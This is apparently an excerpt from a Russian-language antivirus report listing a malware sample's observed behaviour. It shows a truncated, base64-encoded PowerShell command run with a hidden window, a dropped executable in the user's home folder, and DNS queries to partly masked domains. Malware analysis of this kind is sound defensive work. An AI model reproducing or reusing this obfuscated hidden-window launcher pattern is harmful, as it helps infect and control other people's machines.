Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAGQAdwBhAG0AeQBuAHMAaABsAD0AJwBRAG0AcAB2AHgAbwBuAHoAJwA7ACQAUwB0AHkAegB5AGUAdAB4ACAAPQAgACcAOQA3AD...
- %HOMEPATH%\978.exe
- %HOMEPATH%\978.exe
- %HOMEPATH%\978.exe
- DNS ASK fe####alcigar.com
- DNS ASK ca####lchron.com
- DNS ASK th#####nsawshack.com
- DNS ASK fo##ast.cl
- DNS ASK te######domicilio.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAGQAdwBhAG0AeQBuAHMAaABsAD0AJwBRAG0AcAB2AHgAbwBuAHoAJwA7ACQAUwB0AHkAegB5AGUAdAB4ACAAPQAgACcAOQA3AD...' (со скрытым окном)